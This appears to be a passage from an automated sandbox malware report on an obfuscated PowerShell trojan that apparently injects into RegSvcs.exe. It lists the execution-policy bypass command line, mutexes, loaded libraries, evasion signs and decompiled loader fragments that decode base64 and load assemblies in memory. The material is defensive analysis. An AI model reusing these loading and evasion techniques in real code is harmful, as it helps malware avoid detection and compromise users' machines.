            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winPS1@4/5@0/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\pWbxsRP5Z5tLW4V1
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1wqhwie.s1e.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: rZqmN4mRco.ps1 | Virustotal: Detection: 31%
            Source: rZqmN4mRco.ps1 | ReversingLabs: Detection: 23%
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

            Data Obfuscation

            barindex
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH._7ou4q3URxUtrcBhAksV8MILst8vvfhGZzz84cTowdPeJNJqpazaC0zcplhKSCF9TGZGal9qwtbeNZDXuM4ysc7,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.B5vObioagoHeuBETToqXO7c4SBvzgegJ2rVxzrn97Z01VyClBh4RfVnBpn3uLZmwBfvDkA7hA0zjL4bYk2F9Lw,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.MGHflsToeaIGYe2QlJGLifoJfKHFMzr3e7F5gXl32IYYefKteaV3QAP8fQuyq1nSYPUyb4dRKPWQTfFJrBKDJn,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.JavtZpWbEUzyaboWUx5EzFRMnopkNEbRbaMCyBm6SCxx4PxjVvD0SD2eCoxY6CvuIPhM1bDKYzUwSKBPVNSu3Q,_75nEg0zZR0dHe.a5l48OPDiZ3ML()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N6aiy2oVGGWRy[2],_75nEg0zZR0dHe.UcVmBdslgVk5f(Convert.FromBase64String(N6aiy2oVGGWRy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH._7ou4q3URxUtrcBhAksV8MILst8vvfhGZzz84cTowdPeJNJqpazaC0zcplhKSCF9TGZGal9qwtbeNZDXuM4ysc7,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.B5vObioagoHeuBETToqXO7c4SBvzgegJ2rVxzrn97Z01VyClBh4RfVnBpn3uLZmwBfvDkA7hA0zjL4bYk2F9Lw,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.MGHflsToeaIGYe2QlJGLifoJfKHFMzr3e7F5gXl32IYYefKteaV3QAP8fQuyq1nSYPUyb4dRKPWQTfFJrBKDJn,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.JavtZpWbEUzyaboWUx5EzFRMnopkNEbRbaMCyBm6SCxx4PxjVvD0SD2eCoxY6CvuIPhM1bDKYzUwSKBPVNSu3Q,_75nEg0zZR0dHe.a5l48OPDiZ3ML()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N6aiy2oVGGWRy[2],_75nEg0zZR0dHe.UcVmBdslgVk5f(Convert.FromBase64String(N6aiy2oVGGWRy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: RocT7i11N77Uf System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: RocT7i11N77Uf
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: RocT7i11N77Uf System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | .Net Code: RocT7i11N77Uf
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B395B71 push ebp; retf 1_2_00007FFB4B395B72
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B39D108 push 00000048h; iretd 1_2_00007FFB4B39D10A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B3900BD pushad ; iretd 1_2_00007FFB4B3900C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01498080 push eax; iretd 3_2_01498081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01494CC8 pushad ; retf 3_2_01494CD1
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, b4uun3ISTXKnf.cs | High entropy of concatenated method names: 'YCjMUCUaS1W51', 'nBYZp8mEKNdCM', 'A0fHqAYUq6yHF', '_1mVdS59RD9WRXjpk4dgLoY55DRM5wYkWRMGMMurlj3LIOgyP', 'fHMQFoqEOaRpZM5LGroxVJm37fqi9jUrbA6e0tMx0g2V8mYW', 'LoB5UwuYY5RTRpo7KYVsQo0M18w3Nqjvx6hFEJtWrmEhpNS8', '_8xzyi24VkTi5m5Gsy7XUUolTzE6ThsmXs6bUc1FmIJiIWf1C', '_0fb1PXYa6kb1Rh7XSfKSHk6h0u9Dpwhkn0aPYGvFcLJ9j5gx', 'muNz9fBp8MEGjEaAaR4gHkqhVUn1c7430siPvrb9kzSiFIcm', 'br3It0Vta53HcAKawwe4bhthaz6XVj4dQqIhe3SzkIF6mbdR'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Okx2cEcCTYefVQm6EymR3DAHXaTSljZM45uWUuKfmTQXlObkYx2hI.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'qhoRWWDGbIaBYf1xlc2ObtVWJaKjgV1', 'DymWxUA0Gzkq60kzVxmAsWvR6nPAUbA', 'VRGwbt4QosOEYZDJMW6oiZAv0pO17cG', 'yUA6AUHSQfBMMR68GOUobZVEBz10NVn'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, 6jI32o4ws06OX.cs | High entropy of concatenated method names: 'RaiFrYHEhVkGS', 'hx6hnTTFdwvcvMmU5tfd16J2MYSLJ0eJ6OI49uozqUzfAV2hp9pL3WXmxeqoyAR', 'cNGApf86khPqX7UFOcOQ1vxse4iSyACnzfVfGwGsr2VBKXVV9zlAAxqefX2ESAr', 'A59evJghrlNxzbqc6Ps2fGGXCHRposxsPG3o30QgIEcDchw2DXYQuOTjARh5Abl', '_6zBH6zRaU2H1LVlnglmQDC83mL96YyuygQvcn37k0CYYQ5ofHgMOFoWn6791yKg'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.cs | High entropy of concatenated method names: 'PCMd3nft0XRAEjjfTvQ9XSikDVDfw1SFeuJjcMNu23L9ut7hUam2JtbvJNG9Q1LtII1NXrvJ1pXXQSrlwu1LGA', 'Jd7dipyiHVKFnnn5TtLlCT4QqQcZ1LcpveZHXmyGRURwhmIt91DiUsUw2JHJYqACligP1uXjRP19gLBuHeVNXP', 'lqsu07OmfboE51hkKcFQZfOeohQgdsXJpwH19tPJIxbnloG0EQElOpFNlXw1YWFWHdBtCAUCGx7RzUPrp0vj6O', 'Pl2rLE4NFtvwpuxh9sQICrTA02puQ3l0wmGobDtKEtDQYp9NtFnsr0yJ4EXv69vEnPqN47QpRHNc0MkAuxuG3X', 'KdVFbPcZtmc5qWDmWAxenzBQZsFj2y1IkVJrkWTaZqy4RN5x7X4UJCZPqGfR1nIGQKiSLvDck0jrhrNMj4Zhvt', 'sWK8vuJRm8M7VFNfVet38IXxMDOBVpNoEvoaJOy2fXnYDixgCoJOZUvyQExFEXEIJedbrENkdjo3JUdsqHJdHg', '_78E00qSUqiwXMsuRg9AR5r0Et06xyxHKa0yYgelPQWb9XWLYWB4QHANvr24N0UIz7XMOPBk4xHjZRn2irwSEm6', 'Kn2ickZPGCnkIfx2SIh0FyIsImdy0JdL95XdZq2zkx2ARnyABIA01bCELcv0k43JTab4APMbIIb4YBAdNd6fZG', 'a0uJIUhDNBBBOsnT1speyYAmyNBYhRuHZ6DqkqZKWSSvHYpDrB0WRRXcgd7rVvs4H7iax7ntPSkFgBGt4PpWRr', '_72TWMwDUPUengDslxZ7ashZ9blkvIyPqCf8HrPSykCuRkJtI24TRm4hbjqsd3YPrTmShlG573OHlL5nTRSqa1t'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, 75nEg0zZR0dHe.cs | High entropy of concatenated method names: '_5deq5ZMjXSyOV', '_1ylcOTS7IequM', 'Jec3M7x8OHYHU', 'XFGNrMmv4br0v', '_1UPCebSNb17oS', 'ZWHoZcMAqG9NM', 'b2F5a7qBXz5Vo', 'yxkqiLSPeeleq', 'xbsVGOJehhaH3', '_2QsbjhSfy2vJi'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs | High entropy of concatenated method names: '_1nUdV8zCgrBa3pV3QCLM48pI7PGiNwJLvkgLDquedBS0T55d2IBdIKrGglAUEGkd3y4QntF', 'ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx', 'Fqv6NSSymAkmG1Tv6yUOrZ1GG2fbAU7RdkKa1NI9XlVZ6MhApGbUjYA1ZrP9nbK4WaYQWO6', 'NN4ROQ4RugYSKZgXWTebgYaOkvNaAjJLJwZ4WGeS1tFDMHcXwQWLIXcAcxQT9SrJVlS5idE', 'A8u0DQJPq3SvcF1uAdysGKN9Evjx3OQ7rrDcxaJUNmcNtWxHKL5npGDS8Jvg48bYqJTvHCs', 'hm6KXVdf3MWpMoAIsalbhUDSQJwI8Ei27WKvbTt5UVmAEOSCzCom2ybLOPDTY6NKIgssTG5', 'ikPkXINAQMgiz2gNKsResrVJD5I3SwrfAxRQfhldfRVkkXrgfnoxbjRw0b4jEd2hAw5nOyj', 'UtsfbvVmPY2OOjmvLR2JLhy36YRk6vk96eYY8K6gzyUGtVUiyqWf8ry33MA7oYVqMX2thcx', 'W3YjdpEgWQybF', 'Fh9HwxHIZFa4I'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ocdWY4uta2L6F.cs | High entropy of concatenated method names: '_6ZbrahaikQCcd', 'zs2tTgBzWM2mD3yMJQAVREjQu4hieQ4zJOhnrEN0B7Iai5Bj5S1qmooPZamjemY', 'qldTlCiD7qExb6p4FxM2p1D1P4wVYjKrUvg5ITB3mJe01cpffWrLtj0juPPuHby', 'Ee2Ud3UssTJpmjLUQoJ1fHkbl0dggJMamVcMoQhRFOMYQ9wxb7t3njBLekP1Swq', 'pDUvkqaLWIjKFi4nijh2Jb8W1I4Otb9JmwPdWMYUbQEZzafaxgSof1cPOmsujXC'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, zdtkXphm1qUGTOgxhhi6mhj0ZkS1NHj4NF8FjvfZJNSQEp8xxlOX8RlyrbWrOff2QnlKL3srkSeTIIF5qlGNY2.cs | High entropy of concatenated method names: 'yi6PZbY6haSeIP2qzmu8X8djxweLUaPHTLfzJhTrpBjyISPgxoNbD967E6KaCuklnmMJqhQEKm5AGpsuhm5pSN', 'HVGwB1qYNdzDwmFsbSmVov1zNXLwLT8QXhkHsqMK44ZYNBPnRY6H1fTBuMr2Fx1Kxph0CctRvpO1SwTuptCjNO', 'wSQ1TOl0Qw1PGzDkvkXh7wUppmfQM5treEokthCDrGK39TWWXnydBfcdbFG6XjbJC6y3aqqxtbCO6ApGxw2tL6', 'N13xUgTiqRGgZcZSLgqtUAuBlIiSpr5', 'f1eW6VvNCHDPH0jcJOhj3UvX2FcBwMa', 'y59PbByil3pLYv7mufMbV2KNL8dC9TO', 'jBQxblwueNcd01bwF0d8OHwlr1FFL32', 'DK7dv84vaZIzUWLkljXYRsgtl2JmFc6', 'WaxLR0sqXoIPzoMu91Boe8hzh7EaW0z', 'cZKh39JIUQn9kJXDoNgi5yfVlokWVJj'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, b4uun3ISTXKnf.cs | High entropy of concatenated method names: 'YCjMUCUaS1W51', 'nBYZp8mEKNdCM', 'A0fHqAYUq6yHF', '_1mVdS59RD9WRXjpk4dgLoY55DRM5wYkWRMGMMurlj3LIOgyP', 'fHMQFoqEOaRpZM5LGroxVJm37fqi9jUrbA6e0tMx0g2V8mYW', 'LoB5UwuYY5RTRpo7KYVsQo0M18w3Nqjvx6hFEJtWrmEhpNS8', '_8xzyi24VkTi5m5Gsy7XUUolTzE6ThsmXs6bUc1FmIJiIWf1C', '_0fb1PXYa6kb1Rh7XSfKSHk6h0u9Dpwhkn0aPYGvFcLJ9j5gx', 'muNz9fBp8MEGjEaAaR4gHkqhVUn1c7430siPvrb9kzSiFIcm', 'br3It0Vta53HcAKawwe4bhthaz6XVj4dQqIhe3SzkIF6mbdR'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Okx2cEcCTYefVQm6EymR3DAHXaTSljZM45uWUuKfmTQXlObkYx2hI.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'qhoRWWDGbIaBYf1xlc2ObtVWJaKjgV1', 'DymWxUA0Gzkq60kzVxmAsWvR6nPAUbA', 'VRGwbt4QosOEYZDJMW6oiZAv0pO17cG', 'yUA6AUHSQfBMMR68GOUobZVEBz10NVn'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, 6jI32o4ws06OX.cs | High entropy of concatenated method names: 'RaiFrYHEhVkGS', 'hx6hnTTFdwvcvMmU5tfd16J2MYSLJ0eJ6OI49uozqUzfAV2hp9pL3WXmxeqoyAR', 'cNGApf86khPqX7UFOcOQ1vxse4iSyACnzfVfGwGsr2VBKXVV9zlAAxqefX2ESAr', 'A59evJghrlNxzbqc6Ps2fGGXCHRposxsPG3o30QgIEcDchw2DXYQuOTjARh5Abl', '_6zBH6zRaU2H1LVlnglmQDC83mL96YyuygQvcn37k0CYYQ5ofHgMOFoWn6791yKg'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.cs | High entropy of concatenated method names: 'PCMd3nft0XRAEjjfTvQ9XSikDVDfw1SFeuJjcMNu23L9ut7hUam2JtbvJNG9Q1LtII1NXrvJ1pXXQSrlwu1LGA', 'Jd7dipyiHVKFnnn5TtLlCT4QqQcZ1LcpveZHXmyGRURwhmIt91DiUsUw2JHJYqACligP1uXjRP19gLBuHeVNXP', 'lqsu07OmfboE51hkKcFQZfOeohQgdsXJpwH19tPJIxbnloG0EQElOpFNlXw1YWFWHdBtCAUCGx7RzUPrp0vj6O', 'Pl2rLE4NFtvwpuxh9sQICrTA02puQ3l0wmGobDtKEtDQYp9NtFnsr0yJ4EXv69vEnPqN47QpRHNc0MkAuxuG3X', 'KdVFbPcZtmc5qWDmWAxenzBQZsFj2y1IkVJrkWTaZqy4RN5x7X4UJCZPqGfR1nIGQKiSLvDck0jrhrNMj4Zhvt', 'sWK8vuJRm8M7VFNfVet38IXxMDOBVpNoEvoaJOy2fXnYDixgCoJOZUvyQExFEXEIJedbrENkdjo3JUdsqHJdHg', '_78E00qSUqiwXMsuRg9AR5r0Et06xyxHKa0yYgelPQWb9XWLYWB4QHANvr24N0UIz7XMOPBk4xHjZRn2irwSEm6', 'Kn2ickZPGCnkIfx2SIh0FyIsImdy0JdL95XdZq2zkx2ARnyABIA01bCELcv0k43JTab4APMbIIb4YBAdNd6fZG', 'a0uJIUhDNBBBOsnT1speyYAmyNBYhRuHZ6DqkqZKWSSvHYpDrB0WRRXcgd7rVvs4H7iax7ntPSkFgBGt4PpWRr', '_72TWMwDUPUengDslxZ7ashZ9blkvIyPqCf8HrPSykCuRkJtI24TRm4hbjqsd3YPrTmShlG573OHlL5nTRSqa1t'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, 75nEg0zZR0dHe.cs | High entropy of concatenated method names: '_5deq5ZMjXSyOV', '_1ylcOTS7IequM', 'Jec3M7x8OHYHU', 'XFGNrMmv4br0v', '_1UPCebSNb17oS', 'ZWHoZcMAqG9NM', 'b2F5a7qBXz5Vo', 'yxkqiLSPeeleq', 'xbsVGOJehhaH3', '_2QsbjhSfy2vJi'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.csHigh entropy of concatenated method names: '_1nUdV8zCgrBa3pV3QCLM48pI7PGiNwJLvkgLDquedBS0T55d2IBdIKrGglAUEGkd3y4QntF', 'ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx', 'Fqv6NSSymAkmG1Tv6yUOrZ1GG2fbAU7RdkKa1NI9XlVZ6MhApGbUjYA1ZrP9nbK4WaYQWO6', 'NN4ROQ4RugYSKZgXWTebgYaOkvNaAjJLJwZ4WGeS1tFDMHcXwQWLIXcAcxQT9SrJVlS5idE', 'A8u0DQJPq3SvcF1uAdysGKN9Evjx3OQ7rrDcxaJUNmcNtWxHKL5npGDS8Jvg48bYqJTvHCs', 'hm6KXVdf3MWpMoAIsalbhUDSQJwI8Ei27WKvbTt5UVmAEOSCzCom2ybLOPDTY6NKIgssTG5', 'ikPkXINAQMgiz2gNKsResrVJD5I3SwrfAxRQfhldfRVkkXrgfnoxbjRw0b4jEd2hAw5nOyj', 'UtsfbvVmPY2OOjmvLR2JLhy36YRk6vk96eYY8K6gzyUGtVUiyqWf8ry33MA7oYVqMX2thcx', 'W3YjdpEgWQybF', 'Fh9HwxHIZFa4I'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ocdWY4uta2L6F.csHigh entropy of concatenated method names: '_6ZbrahaikQCcd', 'zs2tTgBzWM2mD3yMJQAVREjQu4hieQ4zJOhnrEN0B7Iai5Bj5S1qmooPZamjemY', 'qldTlCiD7qExb6p4FxM2p1D1P4wVYjKrUvg5ITB3mJe01cpffWrLtj0juPPuHby', 'Ee2Ud3UssTJpmjLUQoJ1fHkbl0dggJMamVcMoQhRFOMYQ9wxb7t3njBLekP1Swq', 'pDUvkqaLWIjKFi4nijh2Jb8W1I4Otb9JmwPdWMYUbQEZzafaxgSof1cPOmsujXC'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, zdtkXphm1qUGTOgxhhi6mhj0ZkS1NHj4NF8FjvfZJNSQEp8xxlOX8RlyrbWrOff2QnlKL3srkSeTIIF5qlGNY2.csHigh entropy of concatenated method names: 'yi6PZbY6haSeIP2qzmu8X8djxweLUaPHTLfzJhTrpBjyISPgxoNbD967E6KaCuklnmMJqhQEKm5AGpsuhm5pSN', 'HVGwB1qYNdzDwmFsbSmVov1zNXLwLT8QXhkHsqMK44ZYNBPnRY6H1fTBuMr2Fx1Kxph0CctRvpO1SwTuptCjNO', 'wSQ1TOl0Qw1PGzDkvkXh7wUppmfQM5treEokthCDrGK39TWWXnydBfcdbFG6XjbJC6y3aqqxtbCO6ApGxw2tL6', 'N13xUgTiqRGgZcZSLgqtUAuBlIiSpr5', 'f1eW6VvNCHDPH0jcJOhj3UvX2FcBwMa', 'y59PbByil3pLYv7mufMbV2KNL8dC9TO', 'jBQxblwueNcd01bwF0d8OHwlr1FFL32', 'DK7dv84vaZIzUWLkljXYRsgtl2JmFc6', 'WaxLR0sqXoIPzoMu91Boe8hzh7EaW0z', 'cZKh39JIUQn9kJXDoNgi5yfVlokWVJj'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3243
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3821
